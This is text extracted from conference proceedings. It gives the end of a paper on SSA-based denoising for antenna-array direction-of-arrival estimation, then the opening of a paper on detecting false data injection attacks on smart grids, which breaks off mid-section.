This equation corresponds to one snapshot of data corrupted by noise and N snapshots are available for processing. Here A = [a(θ1 ), ..., a(θV )] is the M × V array response matrix, s(n) is the signal vector. The components of e(n) are i.i.d., complex Gaussian
Sensor Array Signal Processing Using SSA
703
distributed with zero-mean and variance σ 2 . Signal s(n) and noise e(n) are uncorrelated. The array steering vector has the form a(θ ) = [1, exp(jϑ), . . . , exp(j(M − 1)ϑ)]T ,
(3)
where ϑ = 2π sin θ/λ. N × M data matrix which includes N snapshots obtained using M antenna elements has the following form ⎡ ⎤ x1 (1) x2 (1) · · · xM (1) ⎢ x1 (2) x2 (2) · · · xM (2) ⎥ ⎢ ⎥ X = [x1 (n) x2 (n) . . . xM (n)] = ⎢ . (4) .. .. ⎥, ⎣ .. . ··· . ⎦ x1 (N ) x2 (N ) · · · xM (N )
where xm = [xm (1) xm (2) . . . xm (N )]T is the vector containing the N samples that obtained by i th antenna element, m = 1, . . . , M . It should be noted, by analogy to (4) the general form of the data matrix X can be also presented as X = [xT (1) xT (2) . . . xT (n)]T . The feature of application of SSA-like methods to antenna array is the trajectory matrix is formed for each antenna element. In the case of m-th antenna element it is given by ⎡ ⎤ xm (1) xm (2) · · · xm (K) ⎢ xm (2) xm (3) · · · xm (K + 1) ⎥ ⎢ ⎥ (5) Xm = ⎢ . ⎥, .. .. ⎣ .. ⎦ . ··· . xm (l) xm (l + 1) · · · xm (N ) where K = N − l + 1, l is the embedding dimension (or window parameter). The Hankel form of l × K data matrix in (5) was also used in such methods of the spectral analysis as the Prony method [1, 6], the matrix pencil method [32, 35], the methods of parameter estimation based on shift-invariance [38, 39]. In the matrix pencil method parameter l is named as the pencil parameter [32, 35]. Pencil parameter is chosen between N /3 and N /2 for efficient noise filtering. The recommendations about selection of embedding parameter (window length) can be found in [17]. The similar problem related with selection the length of subarray for realization spatial smoothing method [40]. There the size of subarray is recommended as 0.6(M +1). S. Reddi and A. Gershman in [41] defined the vector smoothing operator generating overlapping vectors with reduced length from the underlying vector. It can be adapted for the case considered in the paper. Therefore, the vector smoothing operator VS(·) produces l × 1 vector VS(xm , i, l) = [xm (i) xm (i + 1) . . . xm (i + l − 1)]T .
(6)
Thus, as can be seen from (5), in the result of vector smoothing we obtain K = N − l + 1 different vectors VS(xm , i, l), i = 1, 2, . . . , K. Vector smoothing operator in (6) has the form VS(xm , i, l) = I(i,l) xm ,
(7)
704
V. Vasylyshyn
where I(i,l) is the l × N selection matrix that has first i − 1 zero columns, the l × l identity matrix and the N − l − i + 1 zero columns . . . . . . I(i,l) = [01 .. . . . ..0(i−1) ..Il ..0(i+l) .. . . . ..0N ],
(8)
where 0i is the i th zero column with l rows. The generalization of (5) for all antenna elements allows forming the l × (KM ) extended trajectory (block Hankel) matrix . . . Xbh = [X1 ..X2 .. · · · ..XM ].
(9)
The transformation of the initial data matrix into extended trajectory matrix can be presented in the operator notation by the following way xbh = GH (x),
(10)
where GH is the Hankelisation operator. It should be noted that another form of block-Hankel trajectory matrix is possible when the stacking of embedding matrices corresponding to different elements is performed ⎤ ⎡ x1 ⎢ x2 ⎥ ⎥ ⎢ (11) xbh = ⎢ . ⎥. ⎣ .. ⎦ xM This presentation is the alternative to form presented by (9). The process of trajectory matrix formation based on the input data besides application of the vector smoothing operator can be described by so-called selection matrices widely used in digital signal processing. Selection (windowing) matrices describe the process of selection of part of the data matrix to form the trajectory matrix. It should be noted that selection matrices are used for description of the ESPRIT-like methods, matrix-pencil method, (forward) spatial smoothing method, forward-backward spatial smoothing method, image processing, spatio-frequential smoothing [1, 6, 34]. Selection matrices have the form Ji = [0l×(i−1) Il 0l×(N −l−i+1) ], i = 1, . . . , K. Here 0l×(i−1) is the l × (i − 1) zero matrix and Ji is the selection matrix that selects part of the data matrix (the part of the columns of the data matrix). Therefore the trajectory matrix for m-th antenna element is given by . . (12) xm = J1 xm .. . . . .., JK xm , m = 1, . . . M Block-Hankel matrix Xbh can be expressed in the terms of SVD in the following way Xbh =
my
i=1
ηi ui giH .
(13)
Sensor Array Signal Processing Using SSA
705
Here ηi is the singular value, uˆ i and gˆ i are the left and right singular √ vectors of the matrix Xbh , my ≤ min{l, K} is the rank of matrix. It is known that ηi = λi , where λi is the eigenvalue of CM formed from Xbh . The realization of proposed approach can be described by the following steps: Step 1. For each channel data sequence form data matrix Xm . Step 2. Form Xbh and calculate the spectral decomposition of Xbh or covariance matrix obtained using Xbh . Step 3. Estimate the number of sources using minimum description length approach and calculate the estimate of noise variance σˆ i2 [18, 19]. Vˆ Step 4. Perform the reconstruction step by forming matrix Xf .ext = (ηˆ i − σˆ i )uˆ i gˆ iT . i=1
Step 5. Construct the filtered data matrix Xfilt. by the hankelisation of Xf .ext . Step 6. Calculate the spectral decomposition of Xfilt. and estimate the DOAs θˆv , v = 1, . . . , V using one of the superresolution method. Step 7. End. The term adaptive in the name of considered approach means that the noise reduction adaptively changes due to the variation of noise variance estimate when SNR. In order to reduce the computational load of proposed approach the Lanczos SVD can be used on the step 2. The possible variants of noise variance estimation are presented in [18, 19]. The step 5 is realized by traditional way for each component of Xf .ext separately. . .. . ˜ 1 ..X ˜ i denotes the filtered ˜ 2 . · · · ..X ˜ M ] is formed as a result, where X The matrix Xfilt = [X variant of Xi . Different superresolution methods can be used for the step 6. Due to its simplicity the subspace-based ESPRIT is used as superresolution method for conducting DOA estimation process. Instead of the ESPRIT method, any of known superresolution method can be used such as MUSIC, Root-MUSIC, Min-norm, MODE, subspace fitting methods and others. It should be noted, that the same frequencies of signals causes the degradation of the performance of DOA estimation by considered approach. In such cases, the spatial smoothing procedure is used. The graphical explanation of considered approach is shown on Fig. 2. The components that can be avoided in some cases depicted by dashed line. For example, decorrelation approach (spatial smoothing procedure) is unnecessary for sources with different frequencies. From the other side, the reconstruction of signal and recognition are the option steps. The spatial smoothing method (which is also known as the forward averaging method) is realized by dividing of the array on Ksub overlapping subarrays of Lsub = M −Ksub +1 size. Subarrays are shifted relative to each other on the one antenna element. In the particular case, the ULA can be considered as consisting of two subarrays of (M − 1) antenna elements (Fig. 3). These subarrays are shifted by interelement distance . Selection matrices for such situation have the form J1 = IM −1 0(M −1)×1 and J2 = [0(M −1)×1 IM −1 ], where 0(M −1)×1 is the (M − 1) × 1 zero matrix.
706
V. Vasylyshyn
Fig. 2. Application of SSA-based denoising preprocessing to DOA estimation
The output signal of subarray, k-th k = 1, . . . , Ksub , xk (n) = xk (n), xk+1 (n), . . . , xk+Lsub−1 (n) can be expressed as [6, 36] xk (n) = Asub Dk s(n) + ek (n)
(14)
where Asub is the Lsub × V matrix of steering vectors for k-th subarray, Dk = diag(e(j(ϑ1 (k−1)) , . . . , e(jϑV (k−1)) ) is the V × V diagonal matrix of phase shifts. The phase shifts have a place because of the shift of subarray. It can be shown that CM of xk H 2 has a form Rkk = Asub Dk SDH k Asub + σ I. ˜ obtained as a result of averaging of CMs of Lsub × Lsub spatially smoothed CM R subarrays by the following way ˜ = (1/ksub ) R
Ksub
Rkk ,
(15)
k=1
Spatially smoothed CM can be obtained from the original CM R using the selection matrices Jk = [0Lsub ×(i−1) ILsub 0Lsub ×(M −Lsub −k+1) ] ˜ = (1/ksub ) R
Ksub
T
Jk RJk .
k=1
It can be seen the similarity the Jk and Ji .
Fig. 3. Presentation of the ULA consisting of two subarrays
(16)
Sensor Array Signal Processing Using SSA
707
The graphical explanation of spatial smoothing is presented on Fig. 4. CM presented on the right side of the figure is the result of averaging of CMs showed on the left side. It can be seen that the restriction of spatial smoothing procedure is the reduction of array aperture.
Fig. 4. Spatial smoothed CM calculation
Spatial smoothing (averaging) procedure is one of the CM toeplitzation approaches. It increases the rank of averaged source CM. Similar procedure of CM averaging was used when using surrogate data technology [20]. In our case the spatial smoothing procedure should be performed after step 5 (i.e. based on Xfilt. ). After this step the DOA estimation step is realized. Therefore, for the case with the same frequencies the number of steps grows to 8. The obtained estimates can be used for signal reconstruction. Furthermore, the recognition of signals can be realized thank to noise reduction by adaptive SSA.
3 Simulation Results In this section, the performance of the proposed approach numerically analyzed and is compared to another approaches proposed before. In order to test the effectiveness of proposed and considered approaches we considered a ULA with half a wavelength interelement spacing. Two equally powered signals are assumed to impinge on the ULA. In the process of simulation the DOAs of sources, intersource angular distance, and V number snapshots were changed. The SNR was defined as 10 log10 ( ςv2 /σ 2 ). v=1
In the first case ULA of M = 8 sensors is used, the number of snapshots is N = 64, DOAs of sources are θ1 = 10◦ , θ 2 = 14◦ . The frequencies of signals are f1 = 0.3 Hz and f2 = 0.313 Hz. The angular spacing is less than Rayleigh resolution limit. L = 1000 Monte-Carlo simulation runs were performed. Root-mean square error (RMSE) of DOA estimation was averaged on the number of signals. The least square (LS) ESPRIT was used for simulation. We compared the performance of LS ESPRIT, TLS ESPRIT and LS ESPRIT with adaptive SSA and usual (basic) SSA. RMSE’s of DOA estimation versus the SNR are presented in Fig. 5. LS abbreviation is avoided in the legend. It can be seen from Fig. 5 that performance of the proposed approach is better as compared to another mentioned methods.
708
V. Vasylyshyn
Fig. 5. RMSE of DOA estimation versus the SNR, M = 8, l = 8
In the second case, the performance of methods used for previous case was investigated in dependence on segment size. DOAs of sources were θ1 = 10◦ , θ 2 = 16◦ . Simulation results are presented on Fig. 6.
Fig. 6. RMSEs versus the size of segment, M = 8, SNR = −7 dB
The analysis of the figure shows that performance improvement of proposed approach as compared to basic SSA for considered SNR value is evident for the segment size from 5 to 39. The similar tendency has a place for less angular distance between sources than considered for Fig. 1 (θ < 6◦ ). Based on the results presented on the Fig. 6 in the following simulation l = 20, other parameter of simulations were the same as for Fig. 5 (Fig. 7).
Sensor Array Signal Processing Using SSA
709
Fig. 7. RMSE of DOA estimation versus the SNR, M = 8, l = 20.
Additional improvement of the proposed approach is observed for l = 30. However, the improvement of performance when increasing the segment (window) size is attained by changing of computational load. This can be explained by the size of the matrix Xbh which is l × (KM ), where K = N − l + 1. It is known that the computational load of SVD is O(mr m2c ) flops, where mr (mc ) is the number of rows (columns) of the matrix. Performance relation is not changed if the number of antenna elements reduced (Fig. 8). ULA of M = 6 elements was used and DOAs of sources were θ1 = 10◦ , θ 2 = 16◦ , l = 10.
Fig. 8. RMSE of DOA estimation versus the SNR, M = 6, l = 10
710
V. Vasylyshyn
However, the threshold SNR is changed because of reduction of the number of antenna elements from M = 8 to M = 6. In the following case we consider situation with the same frequencies of signals (i.e. f1 = f2 ). Because the performance of the considered for comparison approaches take a turn for the worse the spatial smoothing procedure is additionally realized as compared to previous situations. Besides the classical spatial smoothing the forward-backward averaging procedure, enhanced spatial smoothing procedure [6], spatial smoothing procedure with improved aperture can be used. The enhanced procedure more fully utilizes the information from the subarrays. DOAs of sources were selected as θ1 = 10◦ , θ 2 = 14◦ . The parameter Lsub = 5 and Ksub = M − Lsub + 1 = 4 subarrays were formed. Figure 9 displays the simulation results performed for such case.
Fig. 9. RMSE of DOA estimation versus the SNR, l = 20, Lsub = 5.
It can be seen that performance of ESPRIT with SSA is also better in the considered case. From the other side, in the considered case the performance of TLS ESPRIT is approximately the same as LS ESPRIT. In the next case the number of snapshots was N = 24. The results of simulation are presented on Fig. 10. Figure 10 shows that in the considered conditions the character of the curves (dependencies of RMSE on SNR) is not changed.
Sensor Array Signal Processing Using SSA
711
Fig. 10. RMSE of DOA estimation versus the SNR, l = 8
4 Conclusion In this contribution the adaptive singular spectrum analysis method, which assumes additional noise reduction in (signal+ noise) subspace, is extended to antenna array signal processing. Spatial smoothing procedure is used in the case with the same frequencies of the signals. Performance of adaptive SSA was compared with classic SSA and TLS method. It is shown that application of proposed approach leads to improved performance of DOA estimation in the case of considered model of signal. Furthermore, the application of adaptive SSA is preferable as compare to TLS method when using ESPRIT method despite the fact that computational load of both denoising approaches is comparable. The proposed method is useful as a preprocessing step to signal estimation methods based on KLT (i.e. subspace-based methods and others). It main steps are related with low rank approximation and approximation of Hankel structured matrix. The low rank approximation step is performed simultaneously with singular value adaptation step, which consists on subtraction of noise standard deviation. The enhancement of DOA estimation performance will allow improving the performance of subsequent signal reconstruction and recognition of the signals. The size of segment (window) influences on the performance and computational load of the approach. The different variants of spatial smoothing procedure can be used including forward-backward spatial smoothing. The quality of noise variance estimate is also influence on the performance of the considered approach. Instead of the classical estimate related with averaging of the noise subspace spectral components the improved estimate is used. It is of interest to apply the considered approach for speech processing with microphone array, for separation of overlapping replies in the secondary surveillance radar, for weak signal acquisition enhancement in the satellite navigation system, for spectral self-coherence restoral in communication systems with antenna array, spectrum sensing for cognitive radio. The wide application of low Earth orbit satellites (Starlink, Iridium,
712
V. Vasylyshyn
Globastar) causes the interest for estimation of the Doppler frequency of received (or downlink) OFDM signals [9, 10, 42]. Furthermore, the generalization of proposed approach to joint angle- frequency, joint angle-time delay estimation, rectangular (circular) array is evident. Joint rangeazimuth-doppler estimation is also possible direction of application of the adaptive SSA. The extension of adaptive SSA to subarray based antenna array, minimum redundancy antenna array is of interest. In the situations with colored noise the prewhitening procedure should be performed. In the presence of jammer the principles of adaptive antenna array can be applied. The application of the damped SVD instead of truncated SVD is also of interest. This variant of SVD is more appropriate in such application as image processing, speech processing and recognition. In the small sample case when the number of snapshot is less than number of antenna elements, the so called diagonal loading or approaches that allow to increase the number of snapshot should be used. Randomized algorithms for the low-rank approximation of matrices, rank-revealing ULV decomposition, graph signal processing, ideas of circulant SSA can be used for realization of proposed approach [43, 44]. Furthermore, additional improvement may be expected when combining the considered approach with other methods of noise reduction and tricks from the antenna array signal processing.
References 1. Pillai, S.U.: Array Signal Processing. Springer, New York (1989). https://doi.org/10.1007/ 978-1-4612-3632-0 2. Sarkar, T.K., Wicks, M.C., Salazar-Palma, M., Bonneau, R.J.: Smart Antennas. WileyInterscience (2003) 3. Godara, L.C.: Smart Antennas. CRC Press, Boca Raton (2004) 4. Bazan, O., Kazi, B.U., Jaseemuddin, M.: Beamforming Antennas in Wireless Networks. Multihop and Millimeter Wave Communication Networks. Springer, Heidelberg (2021). https:// doi.org/10.1007/978-3-030-77459-2 5. Guo, Y.J., Ziolkowski, R.W.: Advanced Antenna Array Engineering for 6G and Beyond Wireless Communications. Wiley-IEEE Press (2021) 6. Trees, H.L.V.: Optimum Array Processing. Part IV of Detection, Estimation and Modulation Theory. Wiley-Interscience (2002) 7. Zoubir, A.M., Viberg, M., Chellappa, R., Theodoridis, S. (eds.): Academic Press Library in Signal Processing: Vol. 3 Array and Statistical Signal Processing. Elsevier (2014) 8. Benesty, J., Cohen, I., Chen, J.: Fundamentals of Signal Enhancement and Array Signal Processing. Wiley, Singapore (2017) 9. Khalife, J., Neinavaie, M., Kassas, Z.: Blind Doppler tracking from OFDM signals transmitted by broadband LEO satellites. Paper Presented at the IEEE Vehicular Technology Conference, April 2021, pp. 1–6 (2021). https://doi.org/10.1109/VTC2021-Spring51267.2021.9448678 10. Chen, Q., Wang, Z., Pedersen, G.F., Shen, M.: Joint satellite-transmitter and ground-receiver digital pre-distortion for active phased arrays in LEO satellite communications. Remote Sens. 14, 4319 (2022). https://doi.org/10.3390/rs14174319 11. Wang, W.-Q.: Retrodirective frequency diverse array focusing for wireless information and power transfer. IEEE J. Sel. Areas Commun. 37(1), 61–73 (2019). https://doi.org/10.1109/ JSAC.2018.2872360
Sensor Array Signal Processing Using SSA
713
12. Vasylyshyn, V.: Direction of arrival estimation using ESPRIT with sparse arrays. Paper Presented at the 2009 European Radar Conference, Rome, pp. 246–249 (2009) 13. Tufts, D.W., Kumaresan, R., Kirsteins, W.: Data adaptive signal estimation by singular value decomposition of a data matrix. Proc. IEEE 70(6), 684–685 (1982) 14. Cadzow, J.A., Wilkes, D.M.: Enhanced resolution and modeling of exponential signals. Paper Presented at the International Conference on Acoustics, Speech, and Signal Processing, Toronto, pp. 3033–3036 (1991) 15. Plaut, G., Vautard, R.: Spells of low-frequency oscillations and weather regimes in the Nothern Hemispere. J. Atmos. Sci. 51(2), 210–236 (1994) 16. Van Huffel, S.: Enhanced resolution based on minimum variance estimation and exponential data modeling. Signal Process. 33(3), 333–355 (1993) 17. Golyandina, N., Zhigljavsky, A.: Singular Spectrum Analysis for Time Series. Springer, Heidelberg (2013). https://doi.org/10.1007/978-3-642-34913-3 18. Vasylyshyn, V.: Adaptive complex singular spectrum analysis with application to modern superresolution methods. In: Radivilova, T., Ageyev, D., Kryvinska, N. (eds.) Data-Centric Business and Applications. LNDECT, vol. 48, pp. 35–54. Springer, Cham (2021). https://doi. org/10.1007/978-3-030-43070-2_3 19. Vasylyshyn, V.: Estimation of signal parameters using SSA and linear transformation of covariance matrix or data Matrix. In: Ageyev, D., Radivilova, T., Kryvinska, N. (eds.) DataCentric Business and Applications. LNDECT, vol. 69, pp. 355–373. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-71892-3_15 20. Kostenko, P., Vasylyshyn, V.I.: Surrogate data generation technology using the SSA method for enhancing the effectiveness of signal spectral analysis. Radioelectron. Commun. Syst. 58, 356–361 (2015). https://doi.org/10.3103/S0735272715080038 21. Mendel, J.M.: Tutorial on higher-order statistics (spectra) in signal processing and system theory: theoretical results and some applications. Proc. IEEE 79(3), 278–305 (1991) 22. Haardt, M., Roemer, F., del Galdo, G.: Higher-order SVD-based subspace estimation to improve the parameter estimation accuracy in multidimensional harmonic retrieval problems. IEEE Trans. Signal Process. 56(7), 3198–3213 (2008) 23. Chen, H., Ahmad, F., Vorobyov, S., Porikli, F.: Tensor decompositions in wireless communications and MIMO radar. IEEE J. Sel. Top. Signal Process. 15(3), 438–453 (2021) 24. Lathauwer, L.D., de Moor, B., Vandewalle, J.: A multilinear singular value decomposition Siam. J. Matrix Anal. Appl. 21(4), 1253–1278 (2000) 25. Johnson, B.A., Abramovich, Y.I.: DOA estimator performance assessment in the preasymptotic domain using the likelihood principle. Signal Process. 90, 1392–1401 (2010) 26. Zhang, Y., Amin, M.G.: Spatial averaging of time–frequency distributions for signal recovery in uniform linear arrays. IEEE Trans. SP 48(10), 2892–2902 (2000) 27. Lekhovitskiy, D., Riabukha, V., Atamanskiy, D., Semeniaka, A., Rachkov, D.: Lattice filtration theory. Part I: one-dimensional lattice filters. Telecommun. Radio Eng. 80(5), 41–79 (2021) 28. Unser, M.: Splines: a perfect fit for signal and image processing. IEEE Signal Process. Mag. 16(6), 22–38 (1999) 29. Hansen, P.C., Jensen, S.H.: Subspace-based noise reduction for speech signals via diagonal and triangular matrix decompositions: survey and analysis. EURASIP J. Adv. Signal Process. 2007(1), 1–24 (2007). https://doi.org/10.1155/2007/92953 30. Vasylyshyn, V., Koval, O., Vasylyshyn, K.: Speech enhancement using modified SSA. Paper Presented at the 2021 IEEE International Conference on Information and Telecommunication Technologies and Radio Electronics (UkrMiCo), 29 November–03 December 2021, Odessa, Ukraine (2021). https://doi.org/10.1109/UkrMiCo52950.2021.9716635 31. Vasylyshyn, V.: Channel estimation method for OFDM communication system using adaptive singular spectrum analysis. Paper Presented at the 2020 IEEE 40th International conference
714
32. 33. 34. 35. 36. 37.
38.
39. 40. 41. 42.
43. 44.
V. Vasylyshyn on Electronics and Nanotechnology (ELNANO), Kyiv, Ukraine (2020). https://doi.org/10. 1109/ELNANO50318.2020.9088787 Hua, Y.: Estimating two-dimensional frequencies by matrix enhancement and matrix pencil. IEEE Trans. SP 40(9), 2267–2280 (1992) Krim, H., Proakis, J.G.: Smoothed eigenspace-based parameter estimation. Autom. Special Issue Stat. Signal Process. Control 30(1), 27–38 (1994) Gunsay, M., Jes, B.D.: Point source localization in blurred images by a frequency-domain eigenvector-based method. IEEE Trans. Image Process. 4(12), 1602–1612 (1995) Sarkar, T.K., Pereira, O.: Using the matrix pencil method to estimate the parameters of a sum of complex exponentials. IEEE Antennas Propag. Mag. 37(1), 48–55 (1995) Shan, T.J., Wax, M., Kailath, T.: On spatial smoothing for DOA estimation of coherent sources. IEEE Trans. Acoust. Speech Signal Process. 33(4), 806–811 (1985) Vasylyshyn, V.: Direction of arrival estimation with ULA using SSA-based preprocessing. Paper Presented at the 2020 IEEE International conference on Problems of Infocommunications, Science and Technology (PIC S&T), Kharkiv, Ukraine, 06–09 October 2020, pp. 497–500 (2020). https://doi.org/10.1109/PICST51311.2020.9468095 Van Der Veen, A.J., Vanderveen, M.C., Paulraj, A.J.: Joint angle and delay estimation using shift-invariance properties. IEEE Signal Process. Lett. 4(5), 142–145 (1997). https://doi.org/ 10.1109/97.575559 Lemma, A.N., van der Veen, A.-J., Deprettere, E.F.: Analysis of joint angle-frequency estimation using ESPRIT. IEEE Trans. SP 51(5), 1264–1283 (2003) Gershman, A.B., Ermolaev, V.T.: Optimal subarray size for spatial smoothing. IEEE Signal Process. Lett. 2(2), 28–30 (1995) Reddy, S.R., Gershman, A.B.: An alternative approach to coherent source location problem. Signal Process. 59, 221–233 (1997) Gurcan, Y., Yarovoy, A.: Super-resolution algorithm for joint range-azimuth-doppler estimation in automotive radars. Paper Presented at in 2017 European Radar Conference (EURAD), pp. 73–76 (2017) Liberty, E., Woolfe, F., Martinsson, P.G., Rokhlin, V., Tygert, M.: Randomized algorithms for the low-rank approximation of matrices. PNAS 104(51), 20167–20172 (2007) Bógalo, J., Poncela, P., Senra, E.: Circulant singular spectrum analysis: a new automated procedure for signal extraction. Signal Process 179, 107824 (2021). https://doi.org/10.1016/ j.sigpro.2020.107824
Method for Detecting FDI Attacks on Intelligent Power Networks Vitalii Martovytskyi , Igor Ruban , Andriy Kovalenko(B) and Oleksandr Sievierinov
,
Kharkiv National University of Radioelectronics, 14, Nauki Avenue, Kharkiv 61000, Ukraine {vitalii.martovitskyi,andriy.kovalenko}@nure.ua
Abstract. Nowadays energy systems in many countries improve and develop based on the concept of deep integration of energy as well as infocomm grids. Thus, energy grids find the possibility to analyze the state of the whole system in real time, to predict the processes in it, to have interactive cooperation with the clients and to run the appliance. Such a concept has been named Smart Grid. This work highlights the concept of Smart Grid, possible vectors of attacks and identification of attack of false data injection (FDI) into the flow of measuring received from the sensors. Identification is based on the use of spatial and temporal correlations in Smart Grids. Keywords: Smart Grid · FDI Attacks · Energy Systems · intelligent grid · false data injection · electric energy systems · cyber-attacks
1 Introduction The existing power systems use the centralized power supply scheme, which implies the use of high voltage and the creation of large-scale energy grids. Local faults in such grids can have a tremendous impact on the entire energy system and often cause large-scale power outages. Moreover, large electricity producers generate and supply electricity in volume, in modes and at cost, and are essentially independent of the actual state of electricity consumers in real time. In terms of reliability of such a grid in conditions of power shortage and high demands by the consumer, this scheme is extremely vulnerable, since it cannot quickly identify problems and respond to them at the consumer level. Nowadays electric energy systems in many countries improve and develop based on the concept of deep integration of electric energy grids and infocommunication networks. Thus, energy grids find the possibility to analyze the whole system in real time, predict processes in it, interact with customers and control the equipment. This concept has been named Smart Grid (or intelligent grid). This paper examines the concept of Smart grid, possible attack vectors and detection of an attack of false data injection (FDI) into sensors measurement data. Identification is based on the use of spatial and temporal correlations in Smart Grids. The purpose of the study is to identify FDI attacks on Smart Grids. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 715–731, 2023. https://doi.org/10.1007/978-3-031-35467-0_42
716
V. Martovytskyi et al.
2 Relevance of Using Smart Grid and Problem Setting 2.1 Relevance of using Smart Grid According to article [1], the results of studies on the implementation of smart grids, which were carried out in some US states, showed a decrease in peak loads on an energy grid, on average, energy bills decreased by 10% (while its cost increased by 15%). Some estimates indicate that the use of a smart grid system by 2020 would allow the US to save about $ 1.8 trillion by reducing energy consumption and increasing reliability. Electricity market experts predict that electricity demand will double by 2030. But the European Union member governments plan to reduce electricity consumption by 9% by 2017 through improved energy efficiency (this can be achieved through the widespread adoption of smart grid technology). In Europe, $ 750 billion in funding is provided for programs to expand smart grids for 30 years. Furthermore, according to study [2], Smart Grid market is expected to reach $ 229.24 billion by 2026 from $ 17.5 billion in 2016. Currently, the most active and full-scale smart grid technology is developing and spreading in Denmark. This is largely due to the fact that this particular country receives a significant amount of energy from alternative sources (20% of the total energy is wind energy). Typically, the structure of Smart Grid is very dynamic and rapidly changing, and advanced economies are the key players in investments in Smart Grid [3, 4]. In terms of funding allocation, we only analyze America and Europe. Funding in America is mainly provided by SGIG (Smart Grid Investment Grant). Figure 1(a) shows SGIG facilities by recipient type. It is obvious that the largest share is accounted for by investor-owned utilities, followed by public power utilities [5]. Figure 1(b) shows the distribution of European funding across leading organizations. As compared to the USA, DSOs/utilities/energy companies spent the largest share of funds, reaching 55%, followed by universities/research centers/consulting companies [5].
Fig. 1. Investment allocation in America and Europe: a) SGIG funds by type of recipient, b) Distribution of EC funding across leading organizations [5]
Method for Detecting FDI Attacks on Intelligent Power Networks
717
2.2 Smart Grid Security Challenges The experience of using Smart Grid has shown their vulnerability to various types of cyberattacks. As can be seen from the annual vulnerability coordination report IncidentResponse-Analyst_2020 [6] Fig. 2, industrial automation is one of the most vulnerable areas.
Fig. 2. Vulnerability coordination report
The key areas of Smart Grid are the control of generation, transmission, distribution and consumption of electricity. Effective and safe communication must be ensured in all areas. Private property, confidentiality and data authentication are of crucial importance to reliability in such systems. The system should also be effective to prevent unauthorized modifications to the entire infrastructure, and therefore it is necessary to develop distributed cybersecurity systems for ensuring data integrity and architecture monitoring. Intelligent grid systems have different vulnerabilities, and each has various features. A number of multiple cyber threats can add different smart grid applications that can cause harm from low to high levels. Correct identification of the type of threats and security vulnerabilities would make it possible to determine the appropriate countermeasures. These attacks may have many serious consequences for smart grids, such as leaked customer information, disrupted infrastructure, or large-scale power outages [7]. The accuracy of data circulating in the system is crucial to the reliable and efficient operation of smart grid. Frequency, current, voltage or GPS time stamp may be changed. Spoofing attacks like identity or data replacement can result in loss of integrity and availability. Moreover, they seriously degrade the reliability, stability and security of smart grid. Spoofing attacks consist of MITM, message replays, and software attacks. The use of multiple devices to monitor the data link, collaboration between GPS services, the use of a single data stream, and the synchronization of measurements with Network Synchronization Protocol (NTP) at different locations in real time are certain important solutions against spoofing attacks [7]. Among the various types of cyberattacks, false data injection (FDI) attacks are undoubtedly the most common but dangerous. Attackers may easily modify system
718
V. Martovytskyi et al.
measurement data and manipulate input commands to degrade system performance or even cause irreparable harm. It should be noted that damage to common systems can be controlled within an acceptable limit if malicious attacks are detected in time. 2.3 Problem Setting The paper examines FDI attack on the energy consumption data. FDI (false data injection) attack targets the smart grid infrastructure by injecting false measurements into periodic measurement reports to the control center. An essential prerequisite for successful FDI attack is to pass OS validation and alert prevention. The attacker generates false measurement injection in such a way that the residual value is even less than the specified threshold. Accordingly, FDI attack can mislead the control center to make wrong decisions that negatively impact the grid performance. This attack can be aimed at raw measurements or condition assessments. In case of FDI attack, additive malicious data are injected into the dimensions of a subset of the meters. In practice, FDI attack can be performed by manipulating network communication channels or hacking meters and/or control centers in smart grid. According to article [8] the measurement model in the case of FDI attack is as follows: yt = Hxt + at + wt, t ≥ τ
(1)
T , a T , ..., a T ]T denotes the injected false data at time t, where at = [a1,t 2,t k,t H - measurement matrix; T , w T , ..., w T ]T - measurement noise vector. wt = [w1,t 2,t k,t In practice, the attacker usually has no information about the grid structure or previous measurements in the smart meter. He can develop his attacks only on the basis of assumptions about the standard power consumption [9]. The simplest application of this attack is to lower the cost of energy bills. In this case, the violators are the electricity consumers themselves. The reverse is also possible: competitors can compromise the state assessment in order to increase the expenses of the attacked company. In this case, the process of energy distribution is disrupted, which can lead not only to financial losses, but also to damage to equipment.
3 FDI Attack Detection Method 3.1 Method of FDI Attack Detection Using Spatial and Temporal Correlations For the goal of the paper, the FDI detection method using spatial and temporal correlations in smart grids is chosen as a basis. Spatio-temporal correlation is an inherent feature found in various physical phenomena, since they are usually continuous in both temporal and spatial domains. Given that the cyber state is a reflection of these phenomena, the estimations of these states in a correlated sphere should also be spatially correlated. In general, the following correlations exist in smart grids: 1. Correlation between generated energy and consumer needs. Typically, in order to reduce the extra overhead caused by energy storage, traditional energy suppliers (such
Method for Detecting FDI Attacks on Intelligent Power Networks
719
as fossil-fueled power plants) tend to dynamically adapt their electricity generation to customer needs. Therefore, these energy suppliers in the same area could be spatially correlated in time, as they should reflect the current state of energy consumption in the vicinity. 2. Correlation between data from closely spaced renewable energy sources. Since renewable energy sources come from natural resources (such as solar and wind power), power generators located in the neighboring area should be able to simultaneously determine the current state of the environment. That is, they are spatially correlated. Moreover, these spatial correlations should be similar to those that have occurred in the past, that means these energy sources are temporarily correlated, as natural resources are continuous and should therefore lead to interrelated effects for these energy suppliers. 3. Correlation between data from closely spaced renewable energy sources. In general, energy consumption in certain area should simultaneously reflect the current state of that region. For example, in winter, energy consumers of neighboring cities tend to consume more energy sources than in summer due to the use of heaters, even though each individual has the distinct energy consumption patterns. Thus, the overall behaviour of the nodes can be consistent and correlated with other consumer nodes at higher abstractions (e.g. in city districts). Difficulties in conducting an FDI attack: 1. Attackers have to know the current configuration of the target power system, in particular the system topology. This system configuration changes frequently due to the planned daily maintenance of energy grid equipment and unplanned events such as unexpected equipment outages. Typically, this information is only available at energy company control centers. 2. Attackers must physically tamper with meters or manipulate meter measurements before they can be used to state assesment in the control center. Attackers must physically tamper with meters or manipulate meter measurements before they can be used to assess health in the control center. Many of these meters are located in places that have protection from unauthorized physical access (for example, substations). Main advantage of FDI attacks researching is the identification of vulnerabilities in existing methods of state assessment. The exact impact of such attacks depends not only on the errors injected, but also on how the measurement data (and therefore measurement errors) will be used in the end applications. Currently, the personnel of the control center are typically involved in the decision-making process. Experienced operators can identify anomalies caused by such attacks.. 3.2 Approaches to FDI Detection Traditional method of FDI attack detection is to assess the relationship between meters measurements and system states. This approach is described in detail in article [9]. In this method, the relationships between raw meter measurements and system states are described as z = H x + e
(2)
720
V. Martovytskyi et al.
